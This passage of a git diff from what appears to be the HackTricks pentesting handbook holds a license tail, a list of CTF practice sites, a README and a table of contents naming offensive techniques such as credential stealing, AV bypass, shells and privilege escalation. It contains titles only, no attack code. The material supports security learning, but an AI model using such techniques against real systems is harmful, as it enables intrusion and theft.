For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information. + + 3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable. + +b. ___ShareAlike.___ + +In addition to the conditions in Section 3(a), if You Share Adapted Material You produce, the following conditions also apply. + +1. The Adapter’s License You apply must be a Creative Commons license with the same License Elements, this version or later, or a BY-SA Compatible License. + +2. You must include the text of, or the URI or hyperlink to, the Adapter's License You apply. You may satisfy this condition in any reasonable manner based on the medium, means, and context in which You Share Adapted Material. + +3. You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, Adapted Material that restrict exercise of the rights granted under the Adapter's License You apply. + +### Section 4 – Sui Generis Database Rights. + +Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: + +a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database; + +b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material, including for purposes of Section 3(b); and + +c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database. + +For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. + +### Section 5 – Disclaimer of Warranties and Limitation of Liability. + +a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__ + +b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__ + +c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability. + +### Section 6 – Term and Termination. + +a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically. + +b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates: + + 1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or + + 2. upon express reinstatement by the Licensor. + + For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License. + +c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License. + +d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License. + +### Section 7 – Other Terms and Conditions. + +a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed. + +b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.t stated herein are separate from and independent of the terms and conditions of this Public License. + +### Section 8 – Interpretation. + +a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License. + +b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions. + +c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor. + +d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority. + +Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. + +Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). diff --git a/Learning & Hacking.md b/Learning & Hacking.md new file mode 100644 index 00000000000..2b3d865d95d --- /dev/null +++ b/Learning & Hacking.md @@ -0,0 +1,51 @@ +# Learning Pages and VMs + +## https://tryhackme.com/ + +Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines. + + + +## https://www.root-me.org/ + +Rootme is another page for online hosted virtual machines to hack. + + + +## https://www.vulnhub.com/ + +Vulnhub has machines to download and then to hack + + + +## https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue + +Hackthebox has online machines to hack, but there are very limited in the free version. + +Recently the launched their academy, but it is a bit more expensive than for example tryhackme and has less. + + + +## https://hack.me/ + +This site seems to be a community platform + + + +## https://www.hacker101.com/ + +Free and smale site with videos and CTFs + + +## https://crackmes.one/ + +This site has a lot of binarys for forensic learning. + +## https://overthewire.org/wargames/ + +The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. + Perfect for beginners. + +## https://www.hackthissite.org/missions/basic/ + +## https://attackdefense.com/ diff --git a/README.md b/README.md deleted file mode 120000 index 351df1dae72..00000000000 --- a/README.md +++ /dev/null @@ -1 +0,0 @@ -src/README.md \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 00000000000..37053d55362 --- /dev/null +++ b/README.md @@ -0,0 +1,56 @@ +--- +description: >- + Welcome to the page where you will find each hacking trick/technique/whatever + I have learnt in CTFs, real life apps, and reading researches and news. +--- + +# HackTricks + +![](.gitbook/assets/portada-alcoholica.png) + +**Welcome to the page where you will find each hacking trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.** + +Here you can find a little **introduction:** + +## [**Pentesting Methodology**](pentesting-methodology.md) + +## [**Pentesting Methodology**](pentesting-methodology.md) + +Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**. + +**Click in the title to start!** + +If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**. +**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book. +Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book. + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +## Corporate Sponsors + +### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\* + +![](.gitbook/assets/ine_logo-3-.jpg) + +[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) + +\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.** + +Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\). + +#### **Courses and Certifications reviews** + +You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their **respective preparation courses**\) in the following page: + +{% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} + +\*\*\*\* + +**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.** + diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 00000000000..537e9f489f2 --- /dev/null +++ b/SUMMARY.md @@ -0,0 +1,580 @@ +# Table of contents + +* [HackTricks](README.md) +* [About the author](about-the-author.md) +* [Getting Started in Hacking](getting-started-in-hacking.md) +* [Pentesting Methodology](pentesting-methodology.md) +* [External Recon Methodology](external-recon-methodology/README.md) + * [Github Leaked Secrets](external-recon-methodology/github-leaked-secrets.md) +* [Phishing Methodology](phishing-methodology/README.md) + * [Clone a Website](phishing-methodology/clone-a-website.md) + * [Detecting Phising](phishing-methodology/detecting-phising.md) + * [Phishing Documents](phishing-methodology/phishing-documents.md) +* [Exfiltration](exfiltration.md) +* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md) +* [Brute Force - CheatSheet](brute-force.md) +* [Search Exploits](search-exploits.md) + +## Shells + +* [Shells \(Linux, Windows, MSFVenom\)](shells/shells/README.md) + * [MSFVenom - CheatSheet](shells/shells/msfvenom.md) + * [Shells - Windows](shells/shells/windows.md) + * [Shells - Linux](shells/shells/linux.md) + * [Full TTYs](shells/shells/full-ttys.md) + +## Linux/Unix + +* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md) +* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md) + * [PAM - Pluggable Authentication Modules](linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md) + * [SELinux](linux-unix/privilege-escalation/selinux.md) + * [Logstash](linux-unix/privilege-escalation/logstash.md) + * [AppArmor](linux-unix/privilege-escalation/apparmor.md) + * [Containerd \(ctr\) Privilege Escalation](linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md) + * [Docker Breakout](linux-unix/privilege-escalation/docker-breakout.md) + * [electron/CEF/chromium debugger abuse](linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md) + * [Escaping from Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md) + * [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md) + * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) + * [Interesting Groups - Linux PE](linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md) + * [lxd/lxc Group - Privilege escalation](linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md) + * [ld.so exploit example](linux-unix/privilege-escalation/ld.so.conf-example.md) + * [Linux Capabilities](linux-unix/privilege-escalation/linux-capabilities.md) + * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md) + * [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md) + * [RunC Privilege Escalation](linux-unix/privilege-escalation/runc-privilege-escalation.md) + * [Seccomp](linux-unix/privilege-escalation/seccomp.md) + * [Splunk LPE and Persistence](linux-unix/privilege-escalation/splunk-lpe-and-persistence.md) + * [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md) + * [Socket Command Injection](linux-unix/privilege-escalation/socket-command-injection.md) + * [Wildcards Spare tricks](linux-unix/privilege-escalation/wildcards-spare-tricks.md) +* [Useful Linux Commands](linux-unix/useful-linux-commands/README.md) + * [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md) +* [Linux Environment Variables](linux-unix/linux-environment-variables.md) + +## MacOS + +* [MacOS Security & Privilege Escalation](macos/macos-security-and-privilege-escalation/README.md) + * [Mac OS Architecture](macos/macos-security-and-privilege-escalation/mac-os-architecture.md) + * [MacOS MDM](macos/macos-security-and-privilege-escalation/macos-mdm/README.md) + * [Enrolling Devices in Other Organisations](macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md) + * [MacOS Protocols](macos/macos-security-and-privilege-escalation/macos-protocols.md) + * [MacOS Red Teaming](macos/macos-security-and-privilege-escalation/macos-red-teaming.md) + * [MacOS Serial Number](macos/macos-security-and-privilege-escalation/macos-serial-number.md) + * [MacOS Apps - Inspecting, debugging and Fuzzing](macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md) + +## Windows + +* [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md) +* [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md) + * [AppendData/AddSubdirectory permission over service registry](windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md) + * [Create MSI with WIX](windows/windows-local-privilege-escalation/create-msi-with-wix.md) + * [DPAPI - Extracting Passwords](windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md) + * [SeImpersonate from High To System](windows/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md) + * [Access Tokens](windows/windows-local-privilege-escalation/access-tokens.md) + * [ACLs - DACLs/SACLs/ACEs](windows/windows-local-privilege-escalation/acls-dacls-sacls-aces.md) + * [Dll Hijacking](windows/windows-local-privilege-escalation/dll-hijacking.md) + * [From High Integrity to SYSTEM with Name Pipes](windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md) + * [Integrity Levels](windows/windows-local-privilege-escalation/integrity-levels.md) + * [JAWS](windows/windows-local-privilege-escalation/jaws.md) + * [JuicyPotato](windows/windows-local-privilege-escalation/juicypotato.md) + * [Leaked Handle Exploitation](windows/windows-local-privilege-escalation/leaked-handle-exploitation.md) + * [MSI Wrapper](windows/windows-local-privilege-escalation/msi-wrapper.md) + * [Named Pipe Client Impersonation](windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md) + * [PowerUp](windows/windows-local-privilege-escalation/powerup.md) + * [Privilege Escalation Abusing Tokens](windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md) + * [Privilege Escalation with Autoruns](windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md) + * [RottenPotato](windows/windows-local-privilege-escalation/rottenpotato.md) + * [Seatbelt](windows/windows-local-privilege-escalation/seatbelt.md) + * [SeDebug + SeImpersonate copy token](windows/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md) + * [Windows C Payloads](windows/windows-local-privilege-escalation/windows-c-payloads.md) +* [Active Directory Methodology](windows/active-directory-methodology/README.md) + * [Abusing Active Directory ACLs/ACEs](windows/active-directory-methodology/acl-persistence-abuse.md) + * [AD information in printers](windows/active-directory-methodology/ad-information-in-printers.md) + * [ASREPRoast](windows/active-directory-methodology/asreproast.md) + * [BloodHound](windows/active-directory-methodology/bloodhound.md) + * [Constrained Delegation](windows/active-directory-methodology/constrained-delegation.md) + * [Custom SSP](windows/active-directory-methodology/custom-ssp.md) + * [DCShadow](windows/active-directory-methodology/dcshadow.md) + * [DCSync](windows/active-directory-methodology/dcsync.md) + * [DSRM Credentials](windows/active-directory-methodology/dsrm-credentials.md) + * [Golden Ticket](windows/active-directory-methodology/golden-ticket.md) + * [Kerberos Authentication](windows/active-directory-methodology/kerberos-authentication.md) + * [Kerberoast](windows/active-directory-methodology/kerberoast.md) + * [MSSQL Trusted Links](windows/active-directory-methodology/mssql-trusted-links.md) + * [Over Pass the Hash/Pass the Key](windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md) + * [Pass the Ticket](windows/active-directory-methodology/pass-the-ticket.md) + * [Password Spraying](windows/active-directory-methodology/password-spraying.md) + * [Force NTLM Privileged Authentication](windows/active-directory-methodology/printers-spooler-service-abuse.md) + * [Privileged Accounts and Token Privileges](windows/active-directory-methodology/privileged-accounts-and-token-privileges.md) + * [Resource-based Constrained Delegation](windows/active-directory-methodology/resource-based-constrained-delegation.md) + * [Security Descriptors](windows/active-directory-methodology/security-descriptors.md) + * [Silver Ticket](windows/active-directory-methodology/silver-ticket.md) + * [Skeleton Key](windows/active-directory-methodology/skeleton-key.md) + * [Unconstrained Delegation](windows/active-directory-methodology/unconstrained-delegation.md) +* [NTLM](windows/ntlm/README.md) + * [Places to steal NTLM creds](windows/ntlm/places-to-steal-ntlm-creds.md) + * [PsExec/Winexec/ScExec](windows/ntlm/psexec-and-winexec.md) + * [SmbExec/ScExec](windows/ntlm/smbexec.md) + * [WmicExec](windows/ntlm/wmicexec.md) + * [AtExec / SchtasksExec](windows/ntlm/atexec.md) + * [WinRM](windows/ntlm/winrm.md) +* [Stealing Credentials](windows/stealing-credentials/README.md) + * [Credentials Protections](windows/stealing-credentials/credentials-protections.md) + * [Mimikatz](windows/stealing-credentials/credentials-mimikatz.md) +* [Authentication, Credentials, UAC and EFS](windows/authentication-credentials-uac-and-efs.md) +* [Basic CMD for Pentesters](windows/basic-cmd-for-pentesters.md) +* [Basic PowerShell for Pentesters](windows/basic-powershell-for-pentesters/README.md) + * [PowerView](windows/basic-powershell-for-pentesters/powerview.md) +* [AV Bypass](windows/av-bypass.md) + +## Mobile Apps Pentesting + +* [Android APK Checklist](mobile-apps-pentesting/android-checklist.md) +* [Android Applications Pentesting](mobile-apps-pentesting/android-app-pentesting/README.md) + * [Android Applications Basics](mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md) + * [Android Task Hijacking](mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md) + * [ADB Commands](mobile-apps-pentesting/android-app-pentesting/adb-commands.md) + * [APK decompilers](mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md) + * [AVD - Android Virtual Device](mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md) + * [Burp Suite Configuration for Android](mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md) + * [content:// protocol](mobile-apps-pentesting/android-app-pentesting/content-protocol.md) + * [Drozer Tutorial](mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md) + * [Exploiting Content Providers](mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md) + * [Exploiting a debuggeable applciation](mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md) + * [Frida Tutorial](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md) + * [Frida Tutorial 1](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md) + * [Frida Tutorial 2](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md) + * [Frida Tutorial 3](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md) + * [Objection Tutorial](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) + * [Google CTF 2018 - Shall We Play a Game?](mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) + * [Inspeckage Tutorial](mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md) + * [Intent Injection](mobile-apps-pentesting/android-app-pentesting/intent-injection.md) + * [Make APK Accept CA Certificate](mobile-apps-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md) + * [Manual DeObfuscation](mobile-apps-pentesting/android-app-pentesting/manual-deobfuscation.md) + * [React Native Application](mobile-apps-pentesting/android-app-pentesting/react-native-application.md) + * [Reversing Native Libraries](mobile-apps-pentesting/android-app-pentesting/reversing-native-libraries.md) + * [Smali - Decompiling/\[Modifying\]/Compiling](mobile-apps-pentesting/android-app-pentesting/smali-changes.md) + * [Spoofing your location in Play Store](mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md) + * [Webview Attacks](mobile-apps-pentesting/android-app-pentesting/webview-attacks.md) +* [iOS Pentesting Checklist](mobile-apps-pentesting/ios-pentesting-checklist.md) +* [iOS Pentesting](mobile-apps-pentesting/ios-pentesting/README.md) + * [Basic iOS Testing Operations](mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md) + * [Burp Suite Configuration for iOS](mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md) + * [Extracting Entitlements From Compiled Application](mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md) + * [Frida Configuration in iOS](mobile-apps-pentesting/ios-pentesting/frida-configuration-in-ios.md) + * [iOS App Extensions](mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md) + * [iOS Basics](mobile-apps-pentesting/ios-pentesting/ios-basics.md) + * [iOS Custom URI Handlers / Deeplinks / Custom Schemes](mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md) + * [iOS Hooking With Objection](mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md) + * [iOS Protocol Handlers](mobile-apps-pentesting/ios-pentesting/ios-protocol-handlers.md) + * [iOS Serialisation and Encoding](mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md) + * [iOS Testing Environment](mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md) + * [iOS UIActivity Sharing](mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md) + * [iOS Universal Links](mobile-apps-pentesting/ios-pentesting/ios-universal-links.md) + * [iOS UIPasteboard](mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md) + * [iOS WebViews](mobile-apps-pentesting/ios-pentesting/ios-webviews.md) + +## Pentesting + +* [Pentesting Network](pentesting/pentesting-network/README.md) + * [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) + * [Spoofing SSDP and UPnP Devices with EvilSSDP](pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md) + * [Wifi Attacks](pentesting/pentesting-network/wifi-attacks/README.md) + * [Evil Twin EAP-TLS](pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md) + * [Pentesting IPv6](pentesting/pentesting-network/pentesting-ipv6.md) + * [Nmap Summary \(ESP\)](pentesting/pentesting-network/nmap-summary-esp.md) + * [Network Protocols Explained \(ESP\)](pentesting/pentesting-network/network-protocols-explained-esp.md) + * [IDS and IPS Evasion](pentesting/pentesting-network/ids-evasion.md) + * [DHCPv6](pentesting/pentesting-network/dhcpv6.md) +* [Pentesting JDWP - Java Debug Wire Protocol](pentesting/pentesting-jdwp-java-debug-wire-protocol.md) +* [Pentesting Printers](pentesting/pentesting-printers/README.md) + * [Accounting bypass](pentesting/pentesting-printers/accounting-bypass.md) + * [Buffer Overflows](pentesting/pentesting-printers/buffer-overflows.md) + * [Credentials Disclosure / Brute-Force](pentesting/pentesting-printers/credentials-disclosure-brute-force.md) + * [Cross-Site Printing](pentesting/pentesting-printers/cross-site-printing.md) + * [Document Processing](pentesting/pentesting-printers/document-processing.md) + * [Factory Defaults](pentesting/pentesting-printers/factory-defaults.md) + * [File system access](pentesting/pentesting-printers/file-system-access.md) + * [Firmware updates](pentesting/pentesting-printers/firmware-updates.md) + * [Memory Access](pentesting/pentesting-printers/memory-access.md) + * [Physical Damage](pentesting/pentesting-printers/physical-damage.md) + * [Software packages](pentesting/pentesting-printers/software-packages.md) + * [Transmission channel](pentesting/pentesting-printers/transmission-channel.md) + * [Print job manipulation](pentesting/pentesting-printers/print-job-manipulation.md) + * [Print Job Retention](pentesting/pentesting-printers/print-job-retention.md) + * [Scanner and Fax](pentesting/pentesting-printers/scanner-and-fax.md) +* [Pentesting SAP](pentesting/pentesting-sap.md) +* [Pentesting Kubernetes](pentesting/pentesting-kubernetes/README.md) + * [Enumeration from a Pod](pentesting/pentesting-kubernetes/enumeration-from-a-pod.md) + * [Hardening Roles/ClusterRoles](pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md) + * [Pentesting Kubernetes from the outside](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) +* [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md) +* [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md) + * [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md) + * [FTP Bounce - Download 2ºFTP file](pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md) +* [22 - Pentesting SSH/SFTP](pentesting/pentesting-ssh.md) +* [23 - Pentesting Telnet](pentesting/pentesting-telnet.md) +* [25,465,587 - Pentesting SMTP/s](pentesting/pentesting-smtp/README.md) + * [SMTP - Commands](pentesting/pentesting-smtp/smtp-commands.md) +* [43 - Pentesting WHOIS](pentesting/43-pentesting-whois.md) +* [53 - Pentesting DNS](pentesting/pentesting-dns.md) +* [69/UDP TFTP/Bittorrent-tracker](pentesting/69-udp-tftp.md) +* [79 - Pentesting Finger](pentesting/pentesting-finger.md) +* [80,443 - Pentesting Web Methodology](pentesting/pentesting-web/README.md) + * [AEM - Adobe Experience Cloud](pentesting/pentesting-web/aem-adobe-experience-cloud.md) + * [Apache](pentesting/pentesting-web/apache.md) + * [Artifactory Hacking guide](pentesting/pentesting-web/artifactory-hacking-guide.md) + * [Buckets](pentesting/pentesting-web/buckets/README.md) + * [Firebase Database](pentesting/pentesting-web/buckets/firebase-database.md) + * [AWS-S3](pentesting/pentesting-web/buckets/aws-s3.md) + * [CGI](pentesting/pentesting-web/cgi.md) + * [Code Review Tools](pentesting/pentesting-web/code-review-tools.md) + * [Drupal](pentesting/pentesting-web/drupal.md) + * [Flask](pentesting/pentesting-web/flask.md) + * [Git](pentesting/pentesting-web/git.md) + * [Golang](pentesting/pentesting-web/golang.md) + * [GraphQL](pentesting/pentesting-web/graphql.md) + * [H2 - Java SQL database](pentesting/pentesting-web/h2-java-sql-database.md) + * [IIS - Internet Information Services](pentesting/pentesting-web/iis-internet-information-services.md) + * [JBOSS](pentesting/pentesting-web/jboss.md) + * [Jenkins](pentesting/pentesting-web/jenkins.md) + * [JIRA](pentesting/pentesting-web/jira.md) + * [Joomla](pentesting/pentesting-web/joomla.md) + * [JSP](pentesting/pentesting-web/jsp.md) + * [Laravel](pentesting/pentesting-web/laravel.md) + * [Moodle](pentesting/pentesting-web/moodle.md) + * [Nginx](pentesting/pentesting-web/nginx.md) + * [PHP Tricks \(SPA\)](pentesting/pentesting-web/php-tricks-esp/README.md) + * [PHP - Useful Functions & disable\_functions/open\_basedir bypass](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md) + * [disable\_functions bypass - php-fpm/FastCGI](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md) + * [disable\_functions bypass - dl function](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md) + * [disable\_functions bypass - PHP 7.0-7.4 \(\*nix only\)](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md) + * [disable\_functions bypass - Imagick <= 3.3.0 PHP >= 5.4 Exploit](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md) + * [disable\_functions - PHP 5.x Shellshock Exploit](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md) + * [disable\_functions - PHP 5.2.4 ionCube extension Exploit](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md) + * [disable\_functions bypass - PHP <= 5.2.9 on windows](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md) + * [disable\_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md) + * [disable\_functions bypass - PHP safe\_mode bypass via proc\_open\(\) and custom environment Exploit](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md) + * [disable\_functions bypass - PHP Perl Extension Safe\_mode Bypass Exploit](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md) + * [disable\_functions bypass - PHP 5.2.3 - Win32std ext Protections Bypass](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md) + * [disable\_functions bypass - PHP 5.2 - FOpen 